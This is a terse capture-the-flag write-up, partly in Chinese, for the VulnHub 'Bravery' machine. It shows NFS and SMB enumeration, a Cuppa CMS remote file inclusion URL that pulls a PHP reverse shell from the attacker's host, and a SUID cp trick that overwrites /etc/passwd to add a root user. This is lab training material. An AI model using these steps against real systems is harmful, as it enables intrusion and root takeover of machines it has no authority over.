vulnhub >_ Bravery
Published on 09 Nov 2020
Bravery





mkdir nfs
sudo mount -t nfs 192.168.43.175:/var/nfsshare nfs


qwertyuioplkjhgfdsazxcvbnm
smb
enum4linux 192.168.43.175


smbclient --no-pass //192.168.43.175/anonymous

anonymous 可以匿名连接但是没什么有价值的东西。
secured 不可以匿名连接,使用-u实验一下已知的用户名,已经发现的可能是密码的字符串
smbclient //192.168.43.175/ -U david



逐个浏览


cuppa cms

很多漏洞。选最简单的,远程文件包含

拉shell,改文件名后缀为.txt
http://192.168.1.112/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=http://192.168.1.108:8080/php-reverse-shell.txt

基础枚举后发现cp 拥有SUID


先复制passwd到本地生成,复制root的信息到最后一行,

利用openssl生成新用户evil的hash

替换掉对应的用户名位和密码位

上传到可写目录tmp

利用cp替换

su evil
